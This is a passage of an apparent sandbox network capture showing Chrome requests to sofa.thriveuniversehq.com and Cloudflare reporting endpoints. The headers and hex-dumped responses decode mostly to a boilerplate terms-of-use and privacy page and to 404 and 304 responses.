                                                          2023-11-27 03:24:00 UTC1369INData Raw: 65 20 62 79 20 74 68 65 0a 09 75 70 6c 6f 61 64 69 6e 67 20 75 73 65 72 2c 20 6f 72 20 61 20 63 6f 70 79 72 69 67 68 74 20 63 6f 6d 70 6c 61 69 6e 74 20 62 79 20 74 68 65 20 72 69 67 68 74 66 75 6c 20 6f 77 6e 65 72 2e 20 54 68 65 72 65 66 6f 72 65 2c 20 62 79 20 75 70 6c 6f 61 64 69 6e 67 20 61 6e 79 20 63 6f 6e 74 65 6e 74 20 74 6f 20 6f 75 72 20 73 69 74 65 2c 20 79 6f 75 20 61 67 72 65 65 20 74 68 61 74 20 79 6f 75 20 67 72 61 6e 74 20 75 73 20 61 20 75 6e 69 76 65 72 73 61 6c 2c 0a 09 70 65 72 70 65 74 75 61 6c 2c 20 73 75 62 6c 69 63 65 6e 73 61 62 6c 65 2c 20 63 6f 6d 6d 65 72 63 69 61 6c 20 61 6e 64 20 6e 6f 6e 2d 63 6f 6d 6d 65 72 63 69 61 6c 2c 20 69 72 72 65 76 6f 63 61 62 6c 65 20 6c 69 63 65 6e 73 65 20 74 6f 20 75 73 65 20 73 75 63 68 20 63
                                                          Data Ascii: e by theuploading user, or a copyright complaint by the rightful owner. Therefore, by uploading any content to our site, you agree that you grant us a universal,perpetual, sublicensable, commercial and non-commercial, irrevocable license to use such c
                                                          2023-11-27 03:24:00 UTC1369INData Raw: 75 63 74 73 2e 0a 3c 2f 70 3e 0a 3c 70 20 64 69 72 3d 22 6c 74 72 22 3e 0a 09 57 65 20 6d 61 79 20 61 6c 73 6f 20 63 6f 6c 6c 65 63 74 20 61 6e 64 20 73 74 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 74 68 61 74 20 69 73 20 67 65 6e 65 72 61 74 65 64 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 61 73 20 79 6f 75 20 6e 61 76 69 67 61 74 65 20 6f 6e 6c 69 6e 65 20 74 68 72 6f 75 67 68 20 74 68 65 20 53 69 74 65 2e 20 46 6f 72 20 65 78 61 6d 70 6c 65 2c 20 77 65 20 6d 61 79 20 63 6f 6c 6c 65 63 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 09 61 62 6f 75 74 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 27 73 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 74 6f 20 74 68 65 20 49 6e 74 65 72 6e 65 74 2c 20 77 68 69 63 68 20 61 6c 6c 6f 77 73 20 75 73 2c 20 61 6d 6f 6e 67 20
                                                          Data Ascii: ucts.</p><p dir="ltr">We may also collect and store information that is generated automatically as you navigate online through the Site. For example, we may collect informationabout your computer's connection to the Internet, which allows us, among
                                                          2023-11-27 03:24:00 UTC1369INData Raw: 65 20 70 72 6f 76 69 64 65 72 73 20 61 6e 64 20 63 6f 6e 74 72 61 63 74 6f 72 73 20 66 6f 72 20 61 20 76 61 72 69 65 74 79 20 6f 66 0a 09 70 75 72 70 6f 73 65 73 2e 20 55 6e 6c 65 73 73 20 79 6f 75 20 69 6e 66 6f 72 6d 20 75 73 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 70 72 6f 63 65 73 73 20 64 65 73 63 72 69 62 65 64 20 62 65 6c 6f 77 2c 20 77 65 20 72 65 73 65 72 76 65 20 74 68 65 20 72 69 67 68 74 20 74 6f 20 75 73 65 2c 20 61 6e 64 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 6f 20 74 68 69 72 64 20 70 61 72 74 69 65 73 2c 20 61 6c 6c 20 6f 66 20 74 68 65 0a 09 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 63 6f 6c 6c 65 63 74 65 64 20 66 72 6f 6d 20 61 6e 64 20 61 62 6f 75 74 20 79 6f 75 20 77 68 69 6c 65 20 79 6f 75 20 61 72 65 20
                                                          Data Ascii: e providers and contractors for a variety ofpurposes. Unless you inform us in accordance with the process described below, we reserve the right to use, and to disclose to third parties, all of theinformation collected from and about you while you are
                                                          2023-11-27 03:24:00 UTC1369INData Raw: 72 6d 61 74 69 6f 6e 20 74 68 65 79 20 63 6f 6c 6c 65 63 74 20 74 6f 20 68 65 6c 70 20 70 72 65 73 65 6e 74 20 74 68 65 69 72 20 61 64 76 65 72 74 69 73 65 6d 65 6e 74 73 2c 20 74 6f 0a 09 68 65 6c 70 20 6d 65 61 73 75 72 65 20 61 6e 64 20 72 65 73 65 61 72 63 68 20 74 68 65 20 61 64 76 65 72 74 69 73 65 6d 65 6e 74 73 27 20 65 66 66 65 63 74 69 76 65 6e 65 73 73 2c 20 6f 72 20 66 6f 72 20 6f 74 68 65 72 20 70 75 72 70 6f 73 65 73 2e 20 54 68 65 20 75 73 65 20 61 6e 64 20 63 6f 6c 6c 65 63 74 69 6f 6e 20 6f 66 20 79 6f 75 72 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 62 79 20 74 68 65 73 65 20 74 68 69 72 64 2d 70 61 72 74 79 0a 09 61 64 76 65 72 74 69 73 65 72 73 20 61 6e 64 20 61 64 20 73 65 72 76 65 72 73 20 69 73 20 67 6f 76 65 72 6e 65 64 20 62 79 20 74
                                                          Data Ascii: rmation they collect to help present their advertisements, tohelp measure and research the advertisements' effectiveness, or for other purposes. The use and collection of your information by these third-partyadvertisers and ad servers is governed by t


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          44192.168.2.549771104.21.1.74434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:24:01 UTC765OUTGET /favicon.ico HTTP/1.1
                                                          Host: sofa.thriveuniversehq.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: image
                                                          Referer: https://sofa.thriveuniversehq.com/s3/terms/terms.php
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0; _TRKPushSubscriberID=150f9b3d-ac91-dc19-3aa7-6e036ac79d42
                                                          2023-11-27 03:24:01 UTC634INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 33 3a 32 34 3a 30 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 31 34 34 30 30 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 45 58 50 49 52 45 44 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e
                                                          Data Ascii: HTTP/1.1 404 Not FoundDate: Mon, 27 Nov 2023 03:24:01 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400CF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.n
                                                          2023-11-27 03:24:01 UTC294INData Raw: 31 31 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 73 6f 66 61 2e 74 68 72 69 76 65 75 6e 69 76 65 72 73 65 68 71 2e
                                                          Data Ascii: 11f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at sofa.thriveuniversehq.
                                                          2023-11-27 03:24:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          45192.168.2.54977235.190.80.14434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:24:01 UTC564OUTOPTIONS /report/v3?s=Ql%2F6%2FLhK%2FE2hXSOr%2BqV4blrmcGlD02a1U%2F55F1JbgXvJQAeddoeC9W1HGdHeKvrQ%2FVYniGYcZ6ZfdWwCWjxbAp2TdfnO1rgq%2FGnUYJh1k1uSp5cozt3jMi0nUiZLEcy8wjm0fhpzFn6Mg3pG HTTP/1.1
                                                          Host: a.nel.cloudflare.com
                                                          Connection: keep-alive
                                                          Origin: https://sofa.thriveuniversehq.com
                                                          Access-Control-Request-Method: POST
                                                          Access-Control-Request-Headers: content-type
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2023-11-27 03:24:02 UTC336INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 61 63 63 65 73 73 2d 63 6f 6e 74 72 6f 6c 2d 6d 61 78 2d 61 67 65 3a 20 38 36 34 30 30 0d 0a 61 63 63 65 73 73 2d 63 6f 6e 74 72 6f 6c 2d 61 6c 6c 6f 77 2d 6d 65 74 68 6f 64 73 3a 20 50 4f 53 54 2c 20 4f 50 54 49 4f 4e 53 0d 0a 61 63 63 65 73 73 2d 63 6f 6e 74 72 6f 6c 2d 61 6c 6c 6f 77 2d 6f 72 69 67 69 6e 3a 20 2a 0d 0a 61 63 63 65 73 73 2d 63 6f 6e 74 72 6f 6c 2d 61 6c 6c 6f 77 2d 68 65 61 64 65 72 73 3a 20 63 6f 6e 74 65 6e 74 2d 74 79 70 65 2c 20 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 0d 0a 64 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 33 3a 32 34 3a 30 31 20 47 4d 54 0d 0a 56 69 61 3a 20 31 2e 31 20 67 6f 6f 67 6c
                                                          Data Ascii: HTTP/1.1 200 OKContent-Length: 0access-control-max-age: 86400access-control-allow-methods: POST, OPTIONSaccess-control-allow-origin: *access-control-allow-headers: content-type, content-lengthdate: Mon, 27 Nov 2023 03:24:01 GMTVia: 1.1 googl


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          46192.168.2.54977335.190.80.14434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:24:02 UTC496OUTPOST /report/v3?s=Ql%2F6%2FLhK%2FE2hXSOr%2BqV4blrmcGlD02a1U%2F55F1JbgXvJQAeddoeC9W1HGdHeKvrQ%2FVYniGYcZ6ZfdWwCWjxbAp2TdfnO1rgq%2FGnUYJh1k1uSp5cozt3jMi0nUiZLEcy8wjm0fhpzFn6Mg3pG HTTP/1.1
                                                          Host: a.nel.cloudflare.com
                                                          Connection: keep-alive
                                                          Content-Length: 455
                                                          Content-Type: application/reports+json
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2023-11-27 03:24:02 UTC455OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 35 35 37 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 73 6f 66 61 2e 74 68 72 69 76 65 75 6e 69 76 65 72 73 65 68 71 2e 63 6f 6d 2f 73 33 2f 74 65 72 6d 73 2f 74 65 72 6d 73 2e 70 68 70 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 31 2e 37 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65
                                                          Data Ascii: [{"age":0,"body":{"elapsed_time":557,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://sofa.thriveuniversehq.com/s3/terms/terms.php","sampling_fraction":1.0,"server_ip":"104.21.1.7","status_code":404,"type":"http.error"},"type
                                                          2023-11-27 03:24:02 UTC168INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 30 0d 0a 64 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 33 3a 32 34 3a 30 32 20 47 4d 54 0d 0a 56 69 61 3a 20 31 2e 31 20 67 6f 6f 67 6c 65 0d 0a 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                                          Data Ascii: HTTP/1.1 200 OKcontent-length: 0date: Mon, 27 Nov 2023 03:24:02 GMTVia: 1.1 googleAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          47192.168.2.549774104.21.1.74434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:24:02 UTC733OUTGET /service_worker.js HTTP/1.1
                                                          Host: sofa.thriveuniversehq.com
                                                          Connection: keep-alive
                                                          Cache-Control: max-age=0
                                                          Accept: */*
                                                          Service-Worker: script
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: same-origin
                                                          Sec-Fetch-Dest: serviceworker
                                                          Referer: https://sofa.thriveuniversehq.com/service_worker.js
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0; _TRKPushSubscriberID=150f9b3d-ac91-dc19-3aa7-6e036ac79d42
                                                          If-None-Match: W/"56-6089030eb3a5a-gzip"
                                                          If-Modified-Since: Wed, 25 Oct 2023 20:20:49 GMT
                                                          2023-11-27 03:24:03 UTC663INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 34 20 4e 6f 74 20 4d 6f 64 69 66 69 65 64 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 33 3a 32 34 3a 30 33 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 57 65 64 2c 20 32 35 20 4f 63 74 20 32 30 32 33 20 32 30 3a 32 30 3a 34 39 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 35 36 2d 36 30 38 39 30 33 30 65 62 33 61 35 61 2d 67 7a 69 70 22 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 31 34 34 30 30 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 67 65 3a 20 34 34 37 31 0d 0a 52 65 70 6f 72 74 2d 54 6f
                                                          Data Ascii: HTTP/1.1 304 Not ModifiedDate: Mon, 27 Nov 2023 03:24:03 GMTConnection: closeLast-Modified: Wed, 25 Oct 2023 20:20:49 GMTETag: "56-6089030eb3a5a-gzip"Vary: Accept-EncodingCache-Control: max-age=14400CF-Cache-Status: HITAge: 4471Report-To


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          48192.168.2.549776104.21.1.74434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:24:10 UTC807OUTGET /s3/terms/terms.php HTTP/1.1
                                                          Host: sofa.thriveuniversehq.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          sec-ch-ua-platform: "Windows"
                                                          Upgrade-Insecure-Requests: 1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: navigate
                                                          Sec-Fetch-Dest: document
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0; _TRKPushSubscriberID=150f9b3d-ac91-dc19-3aa7-6e036ac79d42
                                                          2023-11-27 03:24:10 UTC611INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 33 3a 32 34 3a 31 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f
                                                          Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 03:24:10 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/
                                                          2023-11-27 03:24:10 UTC758INData Raw: 36 65 36 65 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 2c 6e 6f 61 72 63 68 69 76 65 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 20 64 69 72 3d 22 6c 74 72 22 3e 0a 09 73 6f 66 61 2e 74 68 72 69 76 65 75 6e 69 76 65 72 73 65 68 71 2e 63 6f 6d 3c 2f 70 3e 0a 3c 70 20 64 69 72 3d 22 6c 74 72 22 3e 0a 09 54 65 72 6d 73 20 61 6e 64 20 43 6f 6e 64 69 74 69 6f 6e 73 20 6f 66 20 55 73 65 20 61
                                                          Data Ascii: 6e6e<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><meta name="robots" content="noindex,nofollow,noarchive"></head><body><p dir="ltr">sofa.thriveuniversehq.com</p><p dir="ltr">Terms and Conditions of Use a
                                                          2023-11-27 03:24:10 UTC1369INData Raw: 2e 63 6f 6d 2c 20 61 73 20 69 73 20 61 70 70 72 6f 70 72 69 61 74 65 20 69 6e 20 74 68 65 20 63 6f 6e 74 65 78 74 20 6f 66 20 74 68 65 20 75 73 65 20 6f 66 20 74 68 65 20 77 6f 72 64 73 2e 20 4c 69 6b 65 77 69 73 65 2c 20 74 68 65 20 77 6f 72 64 73 20 22 79 6f 75 22 20 61 6e 64 20 22 79 6f 75 72 22 0a 09 72 65 66 65 72 20 74 6f 20 79 6f 75 2c 20 74 68 65 20 70 65 72 73 6f 6e 20 77 68 6f 20 69 73 20 62 65 69 6e 67 20 70 72 65 73 65 6e 74 65 64 20 77 69 74 68 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 66 6f 72 20 79 6f 75 72 20 61 67 72 65 65 6d 65 6e 74 2e 0a 3c 2f 70 3e 0a 3c 70 20 64 69 72 3d 22 6c 74 72 22 3e 0a 09 41 63 63 65 73 73 69 6e 67 20 74 68 65 20 53 69 74 65 2c 20 69 6e 20 61 6e 79 20 6d 61 6e 6e 65 72 2c 20 77 68 65 74 68 65 72 20 61 75 74
                                                          Data Ascii: .com, as is appropriate in the context of the use of the words. Likewise, the words "you" and "your"refer to you, the person who is being presented with this document for your agreement.</p><p dir="ltr">Accessing the Site, in any manner, whether aut
                                                          2023-11-27 03:24:10 UTC1369INData Raw: 64 20 75 73 65 20 6f 66 20 70 65 72 73 6f 6e 61 6c 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 66 72 6f 6d 20 63 68 69 6c 64 72 65 6e 20 75 6e 64 65 72 20 74 68 65 20 61 67 65 0a 09 6f 66 20 74 68 69 72 74 65 65 6e 2c 20 61 6e 64 20 70 72 6f 76 69 64 65 73 20 69 6d 70 6f 72 74 61 6e 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 72 65 67 61 72 64 69 6e 67 20 74 68 65 69 72 20 72 69 67 68 74 73 20 75 6e 64 65 72 20 66 65 64 65 72 61 6c 20 6c 61 77 20 77 69 74 68 20 72 65 73 70 65 63 74 20 74 6f 20 73 75 63 68 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 75 6c 3e 0a 09 3c 6c 69 20 64 69 72 3d 22 6c 74 72 22 3e 0a 09 09 3c 70 20 64 69 72 3d 22 6c 74 72 22 3e 0a 09 09 09 54 68 69 73 20 53 69 74 65 20 69 73 20 6e 6f 74 20 64 69 72 65 63 74
                                                          Data Ascii: d use of personal information from children under the ageof thirteen, and provides important information regarding their rights under federal law with respect to such information.</p><br><ul><li dir="ltr"><p dir="ltr">This Site is not direct
                                                          2023-11-27 03:24:10 UTC1369INData Raw: 20 6f 72 20 6f 74 68 65 72 77 69 73 65 20 64 69 73 74 72 69 62 75 74 65 20 70 65 72 73 6f 6e 61 6c 6c 79 20 69 64 65 6e 74 69 66 69 61 62 6c 65 20 63 6f 6e 74 61 63 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 09 09 09 74 68 72 6f 75 67 68 20 74 68 65 20 53 69 74 65 2e 0a 09 09 3c 2f 70 3e 0a 09 3c 2f 6c 69 3e 0a 09 3c 6c 69 20 64 69 72 3d 22 6c 74 72 22 3e 0a 09 09 3c 70 20 64 69 72 3d 22 6c 74 72 22 3e 0a 09 09 09 42 65 63 61 75 73 65 20 77 65 20 64 6f 20 6e 6f 74 20 63 6f 6c 6c 65 63 74 20 61 6e 79 20 70 65 72 73 6f 6e 61 6c 6c 79 20 69 64 65 6e 74 69 66 69 61 62 6c 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 66 72 6f 6d 20 63 68 69 6c 64 72 65 6e 20 75 6e 64 65 72 20 74 68 65 20 61 67 65 20 6f 66 20 74 68 69 72 74 65 65 6e 20 61 73 20 70 61 72 74 20 6f 66
                                                          Data Ascii: or otherwise distribute personally identifiable contact informationthrough the Site.</p></li><li dir="ltr"><p dir="ltr">Because we do not collect any personally identifiable information from children under the age of thirteen as part of
                                                          2023-11-27 03:24:10 UTC1369INData Raw: 74 65 0a 09 66 6f 72 20 79 6f 75 72 20 70 65 72 73 6f 6e 61 6c 2c 20 6e 6f 6e 2d 63 6f 6d 6d 65 72 63 69 61 6c 20 75 73 65 2c 20 70 72 6f 76 69 64 65 64 20 74 68 61 74 20 79 6f 75 20 6b 65 65 70 20 69 6e 74 61 63 74 20 61 6c 6c 20 63 6f 70 79 72 69 67 68 74 20 61 6e 64 20 6f 74 68 65 72 20 70 72 6f 70 72 69 65 74 61 72 79 20 6e 6f 74 69 63 65 73 2e 0a 3c 2f 70 3e 0a 3c 70 20 64 69 72 3d 22 6c 74 72 22 3e 0a 09 54 68 65 20 74 72 61 64 65 20 6e 61 6d 65 73 20 61 6e 64 20 74 72 61 64 65 6d 61 72 6b 73 20 6f 66 20 74 68 65 20 70 65 72 73 6f 6e 73 20 6f 72 20 65 6e 74 69 74 69 65 73 20 72 65 66 65 72 72 65 64 20 74 6f 20 69 6e 20 6f 75 72 20 61 64 76 65 72 74 69 73 65 6d 65 6e 74 73 20 61 72 65 20 6f 77 6e 65 64 20 62 79 20 74 68 6f 73 65 20 65 6e 74 69 74 69
                                                          Data Ascii: tefor your personal, non-commercial use, provided that you keep intact all copyright and other proprietary notices.</p><p dir="ltr">The trade names and trademarks of the persons or entities referred to in our advertisements are owned by those entiti
                                                          2023-11-27 03:24:10 UTC1369INData Raw: 65 20 62 79 20 74 68 65 0a 09 75 70 6c 6f 61 64 69 6e 67 20 75 73 65 72 2c 20 6f 72 20 61 20 63 6f 70 79 72 69 67 68 74 20 63 6f 6d 70 6c 61 69 6e 74 20 62 79 20 74 68 65 20 72 69 67 68 74 66 75 6c 20 6f 77 6e 65 72 2e 20 54 68 65 72 65 66 6f 72 65 2c 20 62 79 20 75 70 6c 6f 61 64 69 6e 67 20 61 6e 79 20 63 6f 6e 74 65 6e 74 20 74 6f 20 6f 75 72 20 73 69 74 65 2c 20 79 6f 75 20 61 67 72 65 65 20 74 68 61 74 20 79 6f 75 20 67 72 61 6e 74 20 75 73 20 61 20 75 6e 69 76 65 72 73 61 6c 2c 0a 09 70 65 72 70 65 74 75 61 6c 2c 20 73 75 62 6c 69 63 65 6e 73 61 62 6c 65 2c 20 63 6f 6d 6d 65 72 63 69 61 6c 20 61 6e 64 20 6e 6f 6e 2d 63 6f 6d 6d 65 72 63 69 61 6c 2c 20 69 72 72 65 76 6f 63 61 62 6c 65 20 6c 69 63 65 6e 73 65 20 74 6f 20 75 73 65 20 73 75 63 68 20 63
